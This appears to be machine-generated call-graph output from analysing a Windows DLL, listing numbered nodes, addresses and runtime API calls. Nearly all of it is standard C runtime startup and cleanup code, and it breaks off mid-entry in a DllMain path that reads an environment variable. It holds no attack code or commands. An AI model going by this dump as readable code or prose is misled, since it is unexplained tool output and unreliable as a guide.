RtlEnterCriticalSection 16619->16690 16621 6fe73fac 16691 6fe73fe3 16621->16691 16626->16598 16630 6fe73567 RtlLeaveCriticalSection 16627->16630 16629 6fe744f8 16629->16591 16630->16629 16632 6fe741a0 GetCPInfo 16631->16632 16641 6fe74269 16631->16641 16638 6fe741b8 16632->16638 16632->16641 16633 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16636 6fe7431b 16633->16636 16634 6fe75952 __DllMainCRTStartup@12 42 API calls 16635 6fe74220 16634->16635 16642 6fe78ee3 16635->16642 16636->16616 16638->16634 16640 6fe78ee3 43 API calls 16640->16641 16641->16633 16643 6fe7150b __DllMainCRTStartup@12 39 API calls 16642->16643 16644 6fe78ef6 16643->16644 16647 6fe78cf4 16644->16647 16648 6fe78d0f 16647->16648 16649 6fe7488b __fread_nolock MultiByteToWideChar 16648->16649 16653 6fe78d53 16649->16653 16650 6fe78ece 16651 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16650->16651 16652 6fe74241 16651->16652 16652->16640 16653->16650 16654 6fe7047e __fread_nolock 15 API calls 16653->16654 16656 6fe78d79 __alloca_probe_16 16653->16656 16667 6fe78e21 16653->16667 16654->16656 16655 6fe75a53 __freea 14 API calls 16655->16650 16657 6fe7488b __fread_nolock MultiByteToWideChar 16656->16657 16656->16667 16658 6fe78dc2 16657->16658 16658->16667 16675 6fe719fc 16658->16675 16661 6fe78e30 16663 6fe78eb9 16661->16663 16664 6fe7047e __fread_nolock 15 API calls 16661->16664 16668 6fe78e42 __alloca_probe_16 16661->16668 16662 6fe78df8 16666 6fe719fc 6 API calls 16662->16666 16662->16667 16665 6fe75a53 __freea 14 API calls 16663->16665 16664->16668 16665->16667 16666->16667 16667->16655 16668->16663 16669 6fe719fc 6 API calls 16668->16669 16670 6fe78e85 16669->16670 16670->16663 16671 6fe74945 __vfwprintf_l WideCharToMultiByte 16670->16671 16672 6fe78e9f 16671->16672 16672->16663 16673 6fe78ea8 16672->16673 16674 6fe75a53 __freea 14 API calls 16673->16674 16674->16667 16681 6fe716cf 16675->16681 16679 6fe71a4d LCMapStringW 16680 6fe71a0d 16679->16680 16680->16661 16680->16662 16680->16667 16682 6fe717ce __dosmaperr 5 API calls 16681->16682 16683 6fe716e5 16682->16683 16683->16680 16684 6fe71a59 16683->16684 16687 6fe716e9 16684->16687 16686 6fe71a64 16686->16679 16688 6fe717ce __dosmaperr 5 API calls 16687->16688 16689 6fe716ff 16688->16689 16689->16686 16690->16621 16692 6fe6dc53 __fread_nolock 39 API calls 16691->16692 16693 6fe74005 16692->16693 16694 6fe6dc53 __fread_nolock 39 API calls 16693->16694 16695 6fe74024 16694->16695 16696 6fe73fb9 16695->16696 16697 6fe70444 ___free_lconv_mon 14 API calls 16695->16697 16698 6fe73fd7 16696->16698 16697->16696 16701 6fe73567 RtlLeaveCriticalSection 16698->16701 16700 6fe73fc5 16700->16585 16701->16700 16703 6fe6e90b 16702->16703 16707 6fe6e93a 16702->16707 16703->16533 16704 6fe6e951 16705 6fe70444 ___free_lconv_mon 14 API calls 16704->16705 16705->16703 16706 6fe70444 ___free_lconv_mon 14 API calls 16706->16707 16707->16704 16707->16706 16708 6fe6f7fb 16711 6fe6f782 16708->16711 16712 6fe6f78e __FrameHandler3::FrameUnwindToState 16711->16712 16719 6fe7351f RtlEnterCriticalSection 16712->16719 16714 6fe6f7c6 16724 6fe6f7e4 16714->16724 16716 6fe6f798 16716->16714 16720 6fe75692 16716->16720 16719->16716 16721 6fe756a0 __dosmaperr 16720->16721 16723 6fe756ad 16720->16723 16721->16723 16727 6fe753c5 16721->16727 16723->16716 16841 6fe73567 RtlLeaveCriticalSection 16724->16841 16726 6fe6f7d2 16728 6fe75445 16727->16728 16730 6fe753db 16727->16730 16731 6fe70444 ___free_lconv_mon 14 API calls 16728->16731 16754 6fe75493 16728->16754 16730->16728 16732 6fe7540e 16730->16732 16735 6fe70444 ___free_lconv_mon 14 API calls 16730->16735 16733 6fe75467 16731->16733 16742 6fe70444 ___free_lconv_mon 14 API calls 16732->16742 16753 6fe75430 16732->16753 16734 6fe70444 ___free_lconv_mon 14 API calls 16733->16734 16736 6fe7547a 16734->16736 16741 6fe75403 16735->16741 16743 6fe70444 ___free_lconv_mon 14 API calls 16736->16743 16737 6fe70444 ___free_lconv_mon 14 API calls 16738 6fe7543a 16737->16738 16744 6fe70444 ___free_lconv_mon 14 API calls 16738->16744 16739 6fe75501 16745 6fe70444 ___free_lconv_mon 14 API calls 16739->16745 16740 6fe754a1 16740->16739 16752 6fe70444 14 API calls ___free_lconv_mon 16740->16752 16755 6fe756e2 16741->16755 16747 6fe75425 16742->16747 16748 6fe75488 16743->16748 16744->16728 16749 6fe75507 16745->16749 16783 6fe757e0 16747->16783 16751 6fe70444 ___free_lconv_mon 14 API calls 16748->16751 16749->16723 16751->16754 16752->16740 16753->16737 16795 6fe75536 16754->16795 16756 6fe756f3 16755->16756 16782 6fe757dc 16755->16782 16757 6fe75704 16756->16757 16759 6fe70444 ___free_lconv_mon 14 API calls 16756->16759 16758 6fe75716 16757->16758 16760 6fe70444 ___free_lconv_mon 14 API calls 16757->16760 16761 6fe75728 16758->16761 16762 6fe70444 ___free_lconv_mon 14 API calls 16758->16762 16759->16757 16760->16758 16763 6fe7573a 16761->16763 16764 6fe70444 ___free_lconv_mon 14 API calls 16761->16764 16762->16761 16765 6fe7574c 16763->16765 16766 6fe70444 ___free_lconv_mon 14 API calls 16763->16766 16764->16763 16767 6fe70444 ___free_lconv_mon 14 API calls 16765->16767 16769 6fe7575e 16765->16769 16766->16765 16767->16769 16768 6fe75770 16771 6fe75782 16768->16771 16772 6fe70444 ___free_lconv_mon 14 API calls 16768->16772 16769->16768 16770 6fe70444 ___free_lconv_mon 14 API calls 16769->16770 16770->16768 16773 6fe75794 16771->16773 16775 6fe70444 ___free_lconv_mon 14 API calls 16771->16775 16772->16771 16774 6fe757a6 16773->16774 16776 6fe70444 ___free_lconv_mon 14 API calls 16773->16776 16777 6fe757b8 16774->16777 16778 6fe70444 ___free_lconv_mon 14 API calls 16774->16778 16775->16773 16776->16774 16779 6fe757ca 16777->16779 16780 6fe70444 ___free_lconv_mon 14 API calls 16777->16780 16778->16777 16781 6fe70444 ___free_lconv_mon 14 API calls 16779->16781 16779->16782 16780->16779 16781->16782 16782->16732 16784 6fe757ed 16783->16784 16794 6fe75845 16783->16794 16785 6fe70444 ___free_lconv_mon 14 API calls 16784->16785 16787 6fe757fd 16784->16787 16785->16787 16786 6fe7580f 16789 6fe70444 ___free_lconv_mon 14 API calls 16786->16789 16791 6fe75821 16786->16791 16787->16786 16788 6fe70444 ___free_lconv_mon 14 API calls 16787->16788 16788->16786 16789->16791 16790 6fe75833 16793 6fe70444 ___free_lconv_mon 14 API calls 16790->16793 16790->16794 16791->16790 16792 6fe70444 ___free_lconv_mon 14 API calls 16791->16792 16792->16790 16793->16794 16794->16753 16796 6fe75543 16795->16796 16800 6fe75562 16795->16800 16796->16800 16801 6fe7586e 16796->16801 16799 6fe70444 ___free_lconv_mon 14 API calls 16799->16800 16800->16740 16802 6fe7555c 16801->16802 16803 6fe7587f 16801->16803 16802->16799 16837 6fe75849 16803->16837 16806 6fe75849 __dosmaperr 14 API calls 16807 6fe75892 16806->16807 16808 6fe75849 __dosmaperr 14 API calls 16807->16808 16809 6fe7589d 16808->16809 16810 6fe75849 __dosmaperr 14 API calls 16809->16810 16811 6fe758a8 16810->16811 16812 6fe75849 __dosmaperr 14 API calls 16811->16812 16813 6fe758b6 16812->16813 16814 6fe70444 ___free_lconv_mon 14 API calls 16813->16814 16815 6fe758c1 16814->16815 16816 6fe70444 ___free_lconv_mon 14 API calls 16815->16816 16817 6fe758cc 16816->16817 16818 6fe70444 ___free_lconv_mon 14 API calls 16817->16818 16819 6fe758d7 16818->16819 16820 6fe75849 __dosmaperr 14 API calls 16819->16820 16821 6fe758e5 16820->16821 16822 6fe75849 __dosmaperr 14 API calls 16821->16822 16823 6fe758f3 16822->16823 16824 6fe75849 __dosmaperr 14 API calls 16823->16824 16825 6fe75904 16824->16825 16826 6fe75849 __dosmaperr 14 API calls 16825->16826 16827 6fe75912 16826->16827 16828 6fe75849 __dosmaperr 14 API calls 16827->16828 16829 6fe75920 16828->16829 16830 6fe70444 ___free_lconv_mon 14 API calls 16829->16830 16831 6fe7592b 16830->16831 16832 6fe70444 ___free_lconv_mon 14 API calls 16831->16832 16833 6fe75936 16832->16833 16834 6fe70444 ___free_lconv_mon 14 API calls 16833->16834 16835 6fe75941 16834->16835 16836 6fe70444 ___free_lconv_mon 14 API calls 16835->16836 16836->16802 16838 6fe7585b 16837->16838 16839 6fe7586a 16838->16839 16840 6fe70444 ___free_lconv_mon 14 API calls 16838->16840 16839->16806 16840->16838 16841->16726 16847 6fe653c0 16848 6fe653cc 16847->16848 16852 6fe653e2 16848->16852 16853 6fe6ecc6 16848->16853 16850 6fe653da 16851 6fe6672f ___scrt_uninitialize_crt 7 API calls 16850->16851 16851->16852 16854 6fe6ecd1 16853->16854 16857 6fe6ece3 ___scrt_uninitialize_crt 16853->16857 16855 6fe6ecdf 16854->16855 16858 6fe71e26 16854->16858 16855->16850 16857->16850 16861 6fe71cb7 16858->16861 16864 6fe71c0b 16861->16864 16865 6fe71c17 __FrameHandler3::FrameUnwindToState 16864->16865 16872 6fe7351f RtlEnterCriticalSection 16865->16872 16867 6fe71c8d 16881 6fe71cab 16867->16881 16868 6fe71c21 ___scrt_uninitialize_crt 16868->16867 16873 6fe71b7f 16868->16873 16872->16868 16874 6fe71b8b __FrameHandler3::FrameUnwindToState 16873->16874 16884 6fe6cc7d RtlEnterCriticalSection 16874->16884 16876 6fe71bce 16898 6fe71bff 16876->16898 16877 6fe71b95 ___scrt_uninitialize_crt 16877->16876 16885 6fe71dc1 16877->16885 16931 6fe73567 RtlLeaveCriticalSection 16881->16931 16883 6fe71c99 16883->16855 16884->16877 16886 6fe71dd6 __vfwprintf_l 16885->16886 16887 6fe71ddd 16886->16887 16888 6fe71de8 16886->16888 16889 6fe71cb7 ___scrt_uninitialize_crt 68 API calls 16887->16889 16890 6fe71d58 __vfwprintf_l 64 API calls 16888->16890 16891 6fe71de3 16889->16891 16892 6fe71df2 16890->16892 16893 6fe67d4e __vfwprintf_l 39 API calls 16891->16893 16892->16891 16894 6fe6eea2 __fread_nolock 39 API calls 16892->16894 16895 6fe71e20 16893->16895 16896 6fe71e09 16894->16896 16895->16876 16901 6fe77a65 16896->16901 16930 6fe6cc91 RtlLeaveCriticalSection 16898->16930 16900 6fe71bed 16900->16868 16902 6fe77a76 16901->16902 16903 6fe77a83 16901->16903 16904 6fe70431 __dosmaperr 14 API calls 16902->16904 16905 6fe77acc 16903->16905 16907 6fe77aaa 16903->16907 16911 6fe77a7b 16904->16911 16906 6fe70431 __dosmaperr 14 API calls 16905->16906 16908 6fe77ad1 16906->16908 16912 6fe779c3 16907->16912 16910 6fe6def9 ___std_exception_copy 39 API calls 16908->16910 16910->16911 16911->16891 16913 6fe779cf __FrameHandler3::FrameUnwindToState 16912->16913 16925 6fe75062 RtlEnterCriticalSection 16913->16925 16915 6fe779de 16917 6fe752de __wsopen_s 39 API calls 16915->16917 16923 6fe77a23 16915->16923 16916 6fe70431 __dosmaperr 14 API calls 16919 6fe77a2a 16916->16919 16918 6fe77a0a FlushFileBuffers 16917->16918 16918->16919 16920 6fe77a16 GetLastError 16918->16920 16926 6fe77a59 16919->16926 16921 6fe7041e __dosmaperr 14 API calls 16920->16921 16921->16923 16923->16916 16925->16915 16929 6fe75117 RtlLeaveCriticalSection 16926->16929 16928 6fe77a42 16928->16911 16929->16928 16930->16900 16931->16883 16036 6fe64b49 16037 6fe64b54 16036->16037 16043 6fe64b63 16036->16043 16038 6fe64b79 16037->16038 16039 6fe64b59 16037->16039 16046 6fe64b9c 16038->16046 16040 6fe64b5e 16039->16040 16041 6fe64b6f 16039->16041 16040->16043 16060 6fe651de 16040->16060 16065 6fe651bf 16041->16065 16047 6fe64ba8 __FrameHandler3::FrameUnwindToState 16046->16047 16073 6fe6524f 16047->16073 16049 6fe64baf 16050 6fe64bd6 16049->16050 16051 6fe64c9b 16049->16051 16057 6fe64c12 ___scrt_is_nonwritable_in_current_image _unexpected 16049->16057 16084 6fe651b1 16050->16084 16092 6fe653ee IsProcessorFeaturePresent 16051->16092 16054 6fe64ca2 16055 6fe64be5 __RTC_Initialize 16055->16057 16087 6fe650d5 RtlInitializeSListHead 16055->16087 16057->16043 16058 6fe64bf3 16058->16057 16088 6fe65186 16058->16088 16232 6fe6ecbe 16060->16232 16321 6fe6671c 16065->16321 16070 6fe651db 16070->16043 16071 6fe66727 21 API calls 16072 6fe651c8 16071->16072 16072->16043 16074 6fe65258 16073->16074 16096 6fe655eb IsProcessorFeaturePresent 16074->16096 16078 6fe65269 16079 6fe6526d 16078->16079 16106 6fe6eca1 16078->16106 16079->16049 16082 6fe65284 16082->16049 16226 6fe65288 16084->16226 16086 6fe651b8 16086->16055 16087->16058 16089 6fe6518b ___scrt_release_startup_lock 16088->16089 16090 6fe655eb IsProcessorFeaturePresent 16089->16090 16091 6fe65194 16089->16091 16090->16091 16091->16057 16093 6fe65404 __fread_nolock _unexpected 16092->16093 16094 6fe654af IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16093->16094 16095 6fe654f3 _unexpected 16094->16095 16095->16054 16097 6fe65264 16096->16097 16098 6fe666fd 16097->16098 16115 6fe677a7 16098->16115 16101 6fe66706 16101->16078 16103 6fe6670e 16104 6fe66719 16103->16104 16129 6fe677e3 16103->16129 16104->16078 16169 6fe74b10 16106->16169 16109 6fe6672f 16110 6fe66742 16109->16110 16111 6fe66738 16109->16111 16110->16079 16112 6fe66868 ___vcrt_uninitialize_ptd 6 API calls 16111->16112 16113 6fe6673d 16112->16113 16114 6fe677e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 16113->16114 16114->16110 16116 6fe677b0 16115->16116 16118 6fe677d9 16116->16118 16119 6fe66702 16116->16119 16133 6fe679ec 16116->16133 16120 6fe677e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 16118->16120 16119->16101 16121 6fe66835 16119->16121 16120->16119 16150 6fe678fd 16121->16150 16124 6fe6684a 16124->16103 16127 6fe66865 16127->16103 16130 6fe6780d 16129->16130 16131 6fe677ee 16129->16131 16130->16101 16132 6fe677f8 RtlDeleteCriticalSection 16131->16132 16132->16130 16132->16132 16138 6fe67812 16133->16138 16136 6fe67a24 InitializeCriticalSectionAndSpinCount 16137 6fe67a0f 16136->16137 16137->16116 16139 6fe6782f 16138->16139 16142 6fe67833 16138->16142 16139->16136 16139->16137 16140 6fe6789b GetProcAddress 16140->16139 16142->16139 16142->16140 16143 6fe6788c 16142->16143 16145 6fe678b2 LoadLibraryExW 16142->16145 16143->16140 16144 6fe67894 FreeLibrary 16143->16144 16144->16140 16146 6fe678f9 16145->16146 16147 6fe678c9 GetLastError 16145->16147 16146->16142 16147->16146 16148 6fe678d4 ___vcrt_InitializeCriticalSectionEx 16147->16148 16148->16146 16149 6fe678ea LoadLibraryExW 16148->16149 16149->16142 16151 6fe67812 ___vcrt_InitializeCriticalSectionEx 5 API calls 16150->16151 16152 6fe67917 16151->16152 16153 6fe67930 TlsAlloc 16152->16153 16154 6fe6683f 16152->16154 16154->16124 16155 6fe679ae 16154->16155 16156 6fe67812 ___vcrt_InitializeCriticalSectionEx 5 API calls 16155->16156 16157 6fe679c8 16156->16157 16158 6fe679e3 TlsSetValue 16157->16158 16159 6fe66858 16157->16159 16158->16159 16159->16127 16160 6fe66868 16159->16160 16161 6fe66872 16160->16161 16163 6fe66878 16160->16163 16164 6fe67938 16161->16164 16163->16124 16165 6fe67812 ___vcrt_InitializeCriticalSectionEx 5 API calls 16164->16165 16166 6fe67952 16165->16166 16167 6fe6796a TlsFree 16166->16167 16168 6fe6795e 16166->16168 16167->16168 16168->16163 16170 6fe65276 16169->16170 16171 6fe74b20 16169->16171 16170->16082 16170->16109 16171->16170 16173 6fe70308 16171->16173 16174 6fe70314 __FrameHandler3::FrameUnwindToState 16173->16174 16185 6fe7351f RtlEnterCriticalSection 16174->16185 16176 6fe7031b 16186 6fe74fc4 16176->16186 16179 6fe70339 16210 6fe7035f 16179->16210 16185->16176 16187 6fe74fd0 __FrameHandler3::FrameUnwindToState 16186->16187 16188 6fe74ffa 16187->16188 16189 6fe74fd9 16187->16189 16213 6fe7351f RtlEnterCriticalSection 16188->16213 16191 6fe70431 __dosmaperr 14 API calls 16189->16191 16192 6fe74fde 16191->16192 16193 6fe6def9 ___std_exception_copy 39 API calls 16192->16193 16195 6fe7032a 16193->16195 16194 6fe75032 16221 6fe75059 16194->16221 16195->16179 16199 6fe701a2 GetStartupInfoW 16195->16199 16198 6fe75006 16198->16194 16214 6fe74f14 16198->16214 16200 6fe701bf 16199->16200 16202 6fe70253 16199->16202 16201 6fe74fc4 40 API calls 16200->16201 16200->16202 16203 6fe701e7 16201->16203 16205 6fe70258 16202->16205 16203->16202 16204 6fe70217 GetFileType 16203->16204 16204->16203 16206 6fe7025f 16205->16206 16207 6fe702a2 GetStdHandle 16206->16207 16208 6fe70304 16206->16208 16209 6fe702b5 GetFileType 16206->16209 16207->16206 16208->16179 16209->16206 16225 6fe73567 RtlLeaveCriticalSection 16210->16225 16212 6fe7034a 16212->16171 16213->16198 16215 6fe71658 __dosmaperr 14 API calls 16214->16215 16216 6fe74f26 16215->16216 16218 6fe719b1 __wsopen_s 6 API calls 16216->16218 16220 6fe74f33 16216->16220 16217 6fe70444 ___free_lconv_mon 14 API calls 16219 6fe74f88 16217->16219 16218->16216 16219->16198 16220->16217 16224 6fe73567 RtlLeaveCriticalSection 16221->16224 16223 6fe75060 16223->16195 16224->16223 16225->16212 16227 6fe65294 16226->16227 16228 6fe65298 16226->16228 16227->16086 16229 6fe653ee 4 API calls 16228->16229 16231 6fe652a5 ___scrt_release_startup_lock 16228->16231 16230 6fe6530e 16229->16230 16231->16086 16238 6fe6f46b 16232->16238 16235 6fe66727 16304 6fe6676a 16235->16304 16239 6fe6f475 16238->16239 16242 6fe651e3 16238->16242 16240 6fe71930 __dosmaperr 6 API calls 16239->16240 16241 6fe6f47c 16240->16241 16241->16242 16243 6fe7196f __dosmaperr 6 API calls 16241->16243 16242->16235 16244 6fe6f48f 16243->16244 16246 6fe6f332 16244->16246 16247 6fe6f34d 16246->16247 16248 6fe6f33d 16246->16248 16247->16242 16252 6fe6f353 16248->16252 16251 6fe70444 ___free_lconv_mon 14 API calls 16251->16247 16253 6fe6f36e 16252->16253 16254 6fe6f368 16252->16254 16256 6fe70444 ___free_lconv_mon 14 API calls 16253->16256 16255 6fe70444 ___free_lconv_mon 14 API calls 16254->16255 16255->16253 16257 6fe6f37a 16256->16257 16258 6fe70444 ___free_lconv_mon 14 API calls 16257->16258 16259 6fe6f385 16258->16259 16260 6fe70444 ___free_lconv_mon 14 API calls 16259->16260 16261 6fe6f390 16260->16261 16262 6fe70444 ___free_lconv_mon 14 API calls 16261->16262 16263 6fe6f39b 16262->16263 16264 6fe70444 ___free_lconv_mon 14 API calls 16263->16264 16265 6fe6f3a6 16264->16265 16266 6fe70444 ___free_lconv_mon 14 API calls 16265->16266 16267 6fe6f3b1 16266->16267 16268 6fe70444 ___free_lconv_mon 14 API calls 16267->16268 16269 6fe6f3bc 16268->16269 16270 6fe70444 ___free_lconv_mon 14 API calls 16269->16270 16271 6fe6f3c7 16270->16271 16272 6fe70444 ___free_lconv_mon 14 API calls 16271->16272 16273 6fe6f3d5 16272->16273 16278 6fe6f17f 16273->16278 16279 6fe6f18b __FrameHandler3::FrameUnwindToState 16278->16279 16294 6fe7351f RtlEnterCriticalSection 16279->16294 16281 6fe6f1bf 16295 6fe6f1de 16281->16295 16283 6fe6f195 16283->16281 16285 6fe70444 ___free_lconv_mon 14 API calls 16283->16285 16285->16281 16286 6fe6f1ea 16287 6fe6f1f6 __FrameHandler3::FrameUnwindToState 16286->16287 16299 6fe7351f RtlEnterCriticalSection 16287->16299 16289 6fe6f200 16290 6fe6f420 __dosmaperr 14 API calls 16289->16290 16291 6fe6f213 16290->16291 16300 6fe6f233 16291->16300 16294->16283 16298 6fe73567 RtlLeaveCriticalSection 16295->16298 16297 6fe6f1cc 16297->16286 16298->16297 16299->16289 16303 6fe73567 RtlLeaveCriticalSection 16300->16303 16302 6fe6f221 16302->16251 16303->16302 16305 6fe651e8 16304->16305 16306 6fe66774 16304->16306 16305->16043 16312 6fe67973 16306->16312 16309 6fe679ae ___vcrt_FlsSetValue 6 API calls 16310 6fe6678a 16309->16310 16317 6fe6674e 16310->16317 16313 6fe67812 ___vcrt_InitializeCriticalSectionEx 5 API calls 16312->16313 16314 6fe6798d 16313->16314 16315 6fe679a5 TlsGetValue 16314->16315 16316 6fe6677b 16314->16316 16315->16316 16316->16309 16318 6fe66765 16317->16318 16319 6fe66758 16317->16319 16318->16305 16319->16318 16320 6fe6d5ab ___std_exception_destroy 14 API calls 16319->16320 16320->16318 16327 6fe667a3 16321->16327 16323 6fe651c4 16323->16072 16324 6fe6ecb3 16323->16324 16325 6fe6f5e8 __dosmaperr 14 API calls 16324->16325 16326 6fe651d0 16325->16326 16326->16070 16326->16071 16328 6fe667af GetLastError 16327->16328 16329 6fe667ac 16327->16329 16330 6fe67973 ___vcrt_FlsGetValue 6 API calls 16328->16330 16329->16323 16331 6fe667c4 16330->16331 16332 6fe667e3 16331->16332 16333 6fe66829 SetLastError 16331->16333 16334 6fe679ae ___vcrt_FlsSetValue 6 API calls 16331->16334 16332->16333 16333->16323 16335 6fe667dd _unexpected 16334->16335 16335->16332 16336 6fe66805 16335->16336 16337 6fe679ae ___vcrt_FlsSetValue 6 API calls 16335->16337 16338 6fe679ae ___vcrt_FlsSetValue 6 API calls 16336->16338 16339 6fe66819 16336->16339 16337->16336 16338->16339 16340 6fe6d5ab ___std_exception_destroy 14 API calls 16339->16340 16340->16332 18244 6fe6cc31 18245 6fe71e26 ___scrt_uninitialize_crt 68 API calls 18244->18245 18246 6fe6cc39 18245->18246 18254 6fe71ad4 18246->18254 18248 6fe6cc3e 18249 6fe71e2f __DllMainCRTStartup@12 14 API calls 18248->18249 18250 6fe6cc4d RtlDeleteCriticalSection 18249->18250 18250->18248 18251 6fe6cc68 18250->18251 18252 6fe70444 ___free_lconv_mon 14 API calls 18251->18252 18253 6fe6cc73 18252->18253 18255 6fe71ae0 __FrameHandler3::FrameUnwindToState 18254->18255 18264 6fe7351f RtlEnterCriticalSection 18255->18264 18257 6fe71b57 18265 6fe71b76 18257->18265 18260 6fe71b2b RtlDeleteCriticalSection 18261 6fe70444 ___free_lconv_mon 14 API calls 18260->18261 18263 6fe71aeb 18261->18263 18262 6fe6cec7 __DllMainCRTStartup@12 69 API calls 18262->18263 18263->18257 18263->18260 18263->18262 18264->18263 18268 6fe73567 RtlLeaveCriticalSection 18265->18268 18267 6fe71b63 18267->18248 18268->18267 17348 6fe6633a 17351 6fe66388 17348->17351 17352 6fe66345 17351->17352 17353 6fe66391 17351->17353 17353->17352 17360 6fe66795 17353->17360 17356 6fe66795 _unexpected 49 API calls 17357 6fe663d7 17356->17357 17374 6fe6ed08 17357->17374 17361 6fe667a3 _unexpected 23 API calls 17360->17361 17362 6fe6679a 17361->17362 17363 6fe663cc 17362->17363 17380 6fe74c7b 17362->17380 17363->17356 17366 6fe6ed54 17368 6fe6ed5e IsProcessorFeaturePresent 17366->17368 17373 6fe6ed7d 17366->17373 17370 6fe6ed6a 17368->17370 17372 6fe6dcfd _unexpected 8 API calls 17370->17372 17372->17373 17410 6fe6e4c9 17373->17410 17375 6fe6ed14 __FrameHandler3::FrameUnwindToState 17374->17375 17376 6fe6f497 _unexpected 39 API calls 17375->17376 17379 6fe6ed19 17376->17379 17377 6fe6ed44 CallUnexpected 39 API calls 17378 6fe6ed43 17377->17378 17379->17377 17413 6fe74ba9 17380->17413 17383 6fe74cc0 17386 6fe74ccc __FrameHandler3::FrameUnwindToState 17383->17386 17384 6fe6f5e8 __dosmaperr 14 API calls 17392 6fe74cfd _unexpected 17384->17392 17385 6fe74d1c 17388 6fe70431 __dosmaperr 14 API calls 17385->17388 17386->17384 17386->17385 17387 6fe74d2e _unexpected 17386->17387 17386->17392 17389 6fe74d64 _unexpected 17387->17389 17424 6fe7351f RtlEnterCriticalSection 17387->17424 17390 6fe74d21 17388->17390 17395 6fe74da1 17389->17395 17396 6fe74e9e 17389->17396 17406 6fe74dcf 17389->17406 17393 6fe6def9 ___std_exception_copy 39 API calls 17390->17393 17392->17385 17392->17387 17409 6fe74d06 17392->17409 17393->17409 17401 6fe6f497 _unexpected 39 API calls 17395->17401 17395->17406 17397 6fe74ea9 17396->17397 17429 6fe73567 RtlLeaveCriticalSection 17396->17429 17400 6fe6e4c9 _unexpected 21 API calls 17397->17400 17402 6fe74eb1 17400->17402 17404 6fe74dc4 17401->17404 17403 6fe6f497 _unexpected 39 API calls 17407 6fe74e24 17403->17407 17405 6fe6f497 _unexpected 39 API calls 17404->17405 17405->17406 17425 6fe74e4a 17406->17425 17408 6fe6f497 _unexpected 39 API calls 17407->17408 17407->17409 17408->17409 17409->17366 17431 6fe6e306 17410->17431 17414 6fe74bb5 __FrameHandler3::FrameUnwindToState 17413->17414 17419 6fe7351f RtlEnterCriticalSection 17414->17419 17416 6fe74bc3 17420 6fe74c05 17416->17420 17419->17416 17423 6fe73567 RtlLeaveCriticalSection 17420->17423 17422 6fe6ed49 17422->17366 17422->17383 17423->17422 17424->17389 17426 6fe74e4e 17425->17426 17428 6fe74e16 17425->17428 17430 6fe73567 RtlLeaveCriticalSection 17426->17430 17428->17403 17428->17407 17428->17409 17429->17397 17430->17428 17432 6fe6e333 17431->17432 17441 6fe6e344 17431->17441 17442 6fe6e3ce GetModuleHandleW 17432->17442 17437 6fe6e382 17449 6fe6e1d1 17441->17449 17443 6fe6e338 17442->17443 17443->17441 17444 6fe6e429 GetModuleHandleExW 17443->17444 17445 6fe6e468 GetProcAddress 17444->17445 17446 6fe6e47c 17444->17446 17445->17446 17447 6fe6e48f FreeLibrary 17446->17447 17448 6fe6e498 17446->17448 17447->17448 17448->17441 17450 6fe6e1dd __FrameHandler3::FrameUnwindToState 17449->17450 17464 6fe7351f RtlEnterCriticalSection 17450->17464 17452 6fe6e1e7 17465 6fe6e21e 17452->17465 17454 6fe6e1f4 17469 6fe6e212 17454->17469 17457 6fe6e39d 17494 6fe6e410 17457->17494 17459 6fe6e3a7 17460 6fe6e3bb 17459->17460 17461 6fe6e3ab GetCurrentProcess TerminateProcess 17459->17461 17462 6fe6e429 _unexpected 3 API calls 17460->17462 17461->17460 17463 6fe6e3c3 ExitProcess 17462->17463 17464->17452 17466 6fe6e22a __FrameHandler3::FrameUnwindToState _unexpected 17465->17466 17468 6fe6e28e _unexpected 17466->17468 17472 6fe6eb1d 17466->17472 17468->17454 17493 6fe73567 RtlLeaveCriticalSection 17469->17493 17471 6fe6e200 17471->17437 17471->17457 17473 6fe6eb29 __EH_prolog3 17472->17473 17476 6fe6e9e8 17473->17476 17475 6fe6eb50 _unexpected 17475->17468 17477 6fe6e9f4 __FrameHandler3::FrameUnwindToState 17476->17477 17484 6fe7351f RtlEnterCriticalSection 17477->17484 17479 6fe6ea02 17485 6fe6ea43 17479->17485 17484->17479 17486 6fe6ea62 17485->17486 17487 6fe6ea0f 17485->17487 17486->17487 17488 6fe70444 ___free_lconv_mon 14 API calls 17486->17488 17489 6fe6ea37 17487->17489 17488->17487 17492 6fe73567 RtlLeaveCriticalSection 17489->17492 17491 6fe6ea20 17491->17475 17492->17491 17493->17471 17497 6fe735a3 17494->17497 17496 6fe6e415 _unexpected 17496->17459 17498 6fe735b2 _unexpected 17497->17498 17499 6fe735bf 17498->17499 17501 6fe71853 17498->17501 17499->17496 17502 6fe717ce __dosmaperr 5 API calls 17501->17502 17503 6fe7186f 17502->17503 17503->17499 16341 6fe64e89 16342 6fe64e97 16341->16342 16343 6fe64e92 16341->16343 16347 6fe64d53 16342->16347 16361 6fe6508a 16343->16361 16348 6fe64d5f __FrameHandler3::FrameUnwindToState 16347->16348 16349 6fe64d88 dllmain_raw 16348->16349 16350 6fe64d83 16348->16350 16358 6fe64d6e 16348->16358 16351 6fe64da2 dllmain_crt_dispatch 16349->16351 16349->16358 16365 6fe61000 16350->16365 16351->16350 16351->16358 16362 6fe650a0 16361->16362 16364 6fe650a9 16362->16364 16460 6fe6503d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 16362->16460 16364->16342 16366 6fe61012 16365->16366 16367 6fe61010 16365->16367 16370 6fe64402 16366->16370 16371 6fe64430 __fread_nolock 16370->16371 16416 6fe6171f 16371->16416 16374 6fe61135 __DllMainCRTStartup@12 44 API calls 16375 6fe64456 __DllMainCRTStartup@12 _strlen 16374->16375 16376 6fe61075 __DllMainCRTStartup@12 43 API calls 16375->16376 16377 6fe644ae 16376->16377 16378 6fe6d5ab ___std_exception_destroy 14 API calls 16377->16378 16379 6fe644b9 GetEnvironmentVariableW 16378->16379 16380 6fe61135 __DllMainCRTStartup@12 44 API calls 16379->16380 16381 6fe644e6 __DllMainCRTStartup@12 _strlen 16380->16381 16382 6fe61075 __DllMainCRTStartup@12 43 API calls 16381->16382 16383 6fe64545 16382->16383 16384 6fe6d5ab ___std_exception_destroy 14 API calls 16383->16384 16385 6fe64550 16384->16385 16386 6fe61135 __DllMainCRTStartup@12 44 API calls 16385->16386 16387 6fe64567 __DllMainCRTStartup@12 _strlen 16386->16387 16388 6fe61075 